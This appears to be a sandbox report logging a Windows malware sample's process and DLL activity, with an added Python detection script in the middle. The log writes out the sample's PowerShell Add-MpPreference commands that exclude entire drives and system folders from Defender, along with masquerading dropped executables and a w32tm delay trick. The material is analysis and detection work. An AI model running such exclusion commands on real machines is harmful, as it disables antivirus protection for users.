Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: unknown | Process created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
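The process-creation chain above is the part of this report a detection engineer acts on: the sample spawns PowerShell twelve times to add Defender exclusions (whole top-level directories such as C:\Windows and C:\Users, its own path, and the dropped copies, one of them a RuntimeBroker.exe under Program Files (x86)), runs a batch that calls chcp 65001 and w32tm /stripchart /computer:localhost, and drives csc.exe/cvtres.exe with CSC*.TMP inputs under Program Files and System32. The following script is an added example, not part of the Joe Sandbox report or of the sample: it encodes those observations as rules over process-creation events. The event fields, rule names and severities are my own; the sample events are constructed from the command lines listed above, plus two benign controls; the reading of the w32tm localhost query as a timing delay before the next stage is an assumption stated in the comment.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process (hypothetical field name)
    image: str     # image path of the created process
    cmdline: str   # full command line of the created process


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


# Top-level directories no real Defender exclusion should cover wholesale.
BROAD_ROOTS = {"program files", "program files (x86)", "programdata", "recovery",
               "system volume information", "users", "windows"}
# System binary names that malware borrows (RuntimeBroker.exe is the one in this report).
SYSTEM_PROCESS_NAMES = {"runtimebroker.exe", "svchost.exe", "csrss.exe",
                        "lsass.exe", "dllhost.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

EXCLUSION_RE = re.compile(
    r'''add-mppreference\s+-exclusion(path|process|extension)\s+['"]?([^'"]+)''', re.I)
W32TM_DELAY_RE = re.compile(r"w32tm\s+/stripchart\s+/computer:localhost", re.I)
CSC_TMP_RE = re.compile(r'([a-z]:\\[^"]*\\csc[0-9a-f]+\.tmp)', re.I)


def norm(path: str) -> PureWindowsPath:
    """Strip quotes and unify slashes: the sample mixes 'C:/Windows/' and 'C:\\...'."""
    return PureWindowsPath(path.strip().strip("'\"").replace("/", "\\"))


def in_system_dir(path: PureWindowsPath) -> bool:
    parent = str(path.parent).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in SYSTEM_DIRS)


def check_exclusion(ev: ProcEvent) -> list[Finding]:
    m = EXCLUSION_RE.search(ev.cmdline)
    if not m:
        return []
    kind, target = m.group(1).lower(), norm(m.group(2))
    parts = [p.lower() for p in target.parts]        # 'C:\\Windows\\' -> ['c:\\', 'windows']
    out = [Finding("defender_exclusion_added", "medium", f"{kind}={target}")]
    if len(parts) == 1 or (len(parts) == 2 and parts[1] in BROAD_ROOTS):
        out.append(Finding("defender_exclusion_broad_root", "high", str(target)))
    if str(target).lower() == str(norm(ev.parent)).lower():   # parent excludes itself
        out.append(Finding("defender_exclusion_self", "high", str(target)))
    if target.name.lower() in SYSTEM_PROCESS_NAMES and not in_system_dir(target):
        out.append(Finding("defender_exclusion_masquerade", "high", str(target)))
    return out


def check_masquerade(ev: ProcEvent) -> list[Finding]:
    img = norm(ev.image)
    if img.name.lower() in SYSTEM_PROCESS_NAMES and not in_system_dir(img):
        return [Finding("system_process_name_unexpected_location", "high", str(img))]
    return []


def check_w32tm_delay(ev: ProcEvent) -> list[Finding]:
    # Assumption: sampling the local clock with /stripchart has no administrative use
    # and serves as a few-second sleep in the batch before the next stage starts.
    if norm(ev.image).name.lower() == "w32tm.exe" and W32TM_DELAY_RE.search(ev.cmdline):
        return [Finding("w32tm_localhost_stripchart", "medium", ev.cmdline)]
    return []


def check_compile_location(ev: ProcEvent) -> list[Finding]:
    if norm(ev.image).name.lower() not in {"csc.exe", "cvtres.exe"}:
        return []
    out = []
    for raw in CSC_TMP_RE.findall(ev.cmdline):
        tmp = norm(raw)
        top = tmp.parts[1].lower() if len(tmp.parts) > 1 else ""
        if top in {"windows", "program files", "program files (x86)"}:
            out.append(Finding("csc_artifact_in_system_dir", "high", str(tmp)))
    return out


CHECKS = (check_exclusion, check_masquerade, check_w32tm_delay, check_compile_location)


def analyze(events: list[ProcEvent]) -> list[Finding]:
    return [f for ev in events for check in CHECKS for f in check(ev)]


# Constructed sample events mirroring the report's command lines (not a real log).
SAMPLE = "C:\\Users\\user\\Desktop\\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CSC = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
CVTRES = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe"
SAMPLE_EVENTS = [
    ProcEvent(SAMPLE, PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'"),
    ProcEvent(SAMPLE, PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/Users/'"),
    ProcEvent(SAMPLE, PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath "
              "'C:\\Program Files (x86)\\windows portable devices\\RuntimeBroker.exe'"),
    ProcEvent(SAMPLE, PS, f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{SAMPLE}'"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\w32tm.exe",
              "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    ProcEvent(CSC, CVTRES, f"{CVTRES} /NOLOGO /READONLY /MACHINE:IX86 "
              "\"/OUT:C:\\Users\\user~1\\AppData\\Local\\Temp\\RES6B99.tmp\" "
              "\"c:\\Windows\\System32\\CSC5918AA24663347D392372538DC1C654.TMP\""),
    ProcEvent(SAMPLE, "C:\\Program Files (x86)\\Windows Portable Devices\\RuntimeBroker.exe",
              "\"RuntimeBroker.exe\""),
    # Benign controls: the real RuntimeBroker from System32, and a narrow exclusion.
    ProcEvent("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\RuntimeBroker.exe",
              "RuntimeBroker.exe -Embedding"),
    ProcEvent("C:\\Windows\\explorer.exe", PS,
              "powershell Add-MpPreference -ExclusionPath 'D:\\Builds\\out'"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

Run against the constructed events the script reports twelve findings: the two benign controls produce nothing beyond the single medium "exclusion added" for the narrow D:\Builds\out path, while every command line taken from the report triggers at least one high-severity rule. The path normalisation matters in practice because the sample deliberately mixes forward and back slashes in its exclusion arguments, which defeats a naive substring match on "C:\Windows".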
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: amsi.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: edputil.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: slc.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: sppc.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: mscoree.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: apphelp.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: version.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: mscoree.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: version.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe  Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: vcruntime140_clr0400.dll
